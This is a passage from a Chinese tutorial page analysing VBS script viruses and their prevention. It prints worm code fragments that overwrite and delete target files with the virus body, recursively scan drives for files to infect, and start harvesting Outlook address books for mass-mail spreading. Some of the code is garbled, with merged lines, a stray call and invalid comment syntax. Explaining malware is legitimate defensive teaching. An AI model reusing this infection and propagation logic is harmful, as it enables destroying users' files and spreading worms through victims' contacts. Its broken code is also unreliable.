VBS脚本病毒原理分析与防范 （1）

• ' 写打开目标文件，准备写入病毒代码
  ap.write vbscopy　　　　　　　 ' 将病毒代码覆盖目标文件
  ap.close
  set cop=fso.getfile(目标文件.path)　 '得到目标文件路径
  cop.copy(目标文件.path & ".vbs")　　
  ' 创建另外一个病毒文件（以.vbs为后缀）
  目标文件.delete(true)　　　　　　
   　 '删除目标文件
   
  
  
  上面描述了病毒文件是如何感染正常文件的：首先将病毒自身代码赋给字符串变量vbscopy，然后将这个字符串覆盖写到目标文件，并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本，最后删除目标文件。
  
  下面我们具体分析一下文件搜索代码：
  
  '该函数主要用来寻找满足条件的文件，并生成对应文件的一个病毒副本
  sub scan(folder_)　　'scan函数定义，
  on error resume next　　'如果出现错误，直接跳过，防止弹出错误窗口
  set folder_=fso.getfolder(folder_)
  set files=folder_.files　' 当前目录的所有文件集合
  for each file in filesext=fso.GetExtensionName(file)　　
   　　 '获取文件后缀
  ext=lcase(ext)　　'后缀名转换成小写字母
  if ext="mp5" then　　'如果后缀名是mp5，则进行感染。
  请自己建立相应后缀名的文件，最好是非正常后缀名 ，以免破坏正常程序。
  Wscript.echo (file)
  end if
  next
  set subfolders=folder_.subfolders
  for each subfolder in subfolders　
   '搜索其他目录；递归调用
    scan( )　
    scan(subfolder)
  next
  end sub
   
  
  
  上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍，非常巧妙，采用了一个递归的算法遍历整个分区的目录和文件。
  
  2．vbs脚本病毒通过网络传播的几种方式及代码分析
  
  VBS脚本病毒之所以传播范围广，主要依赖于它的网络传播功能，一般来说，VBS脚本病毒采用如下几种方式进行传播：
  
  1）通过Email附件传播
  
  这是一种用的非常普遍的传播方式，病毒可以通过各种方法拿到合法的Email地址，最常见的就是直接取Outlook地址簿中的邮件地址，也可以通过程序在用户文档（譬如htm文件）中搜索Email地址。
  
  下面我们具体分析一下VBS脚本病毒是如何做到这一点的：
  
  Function mailBroadcast()
  on error resume next
  wscript.echo
  Set outlookApp = CreateObject("Outlook.Application")
  
  //创建一个OUTLOOK应用的对象
  If outlookApp= "Outlook" Then
    Set mapiObj=outlookApp.GetNameSpace("MAPI")
    //获取MAPI的名字空间
    Set addrList= mapiObj.AddressLists　　　　
   //获取地址表的个数
    For Each addr In addrList
   If　addr.AddressEntries.Count <> 0 Then
   addrEntCount = addr.AddressEntries.Count
  
• 上一页 [1] [2] [3] [4] [5] [6] [7] [8] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• VBS脚本病毒原理分析与防范 （1） 相关文章：
• ·劳动法相关小案例:病假工资如何计算?
• ·病毒清除技巧 ati2evxx.exe 的清除方法
• ·梦幻西游盗号木马下载病毒并盗号
• ·反病毒引擎设计
• ·Kvsc3.exe、Kvsc3.dll病毒查杀清除方法
• ·反病毒引擎设计全解
• ·计算机病毒检测方法
• ·VBS脚本病毒原理分析与防范 （1）
• ·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集
• ·防病毒必务宝典—计算机病毒专杀进程列表
• VBS脚本病毒原理分析与防范 （1） 相关软件
• ·USBKiller(U盘病毒专杀工具) V2.1 build 正式版 0706
• ·诺顿防病毒软件(Norton AntiVirus) V2007
• ·U盘病毒专杀工具(USBCleaner) V6.0 Build 20070722
• ·超级巡警之U盘病毒免疫器V1.4 正式版
• ·金山毒霸 引擎病毒库升级包 2007.07.19
• ·Autorun病毒防御者V2.0 Beta 1
• ·Kaspersky(卡巴斯基) Anti-Virus 累计病毒库 2007.07.22
• ·江民“威金Worm.Viking”病毒专杀工具 V1.0.0
• ·数据病毒木马暴力杀灭天王 PowerRmv V1.0
• ·“征途木马”病毒专杀工具 V3.3

上一篇:宿舍网 DIY 完全上手指南

下一篇:给自己系统加速

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐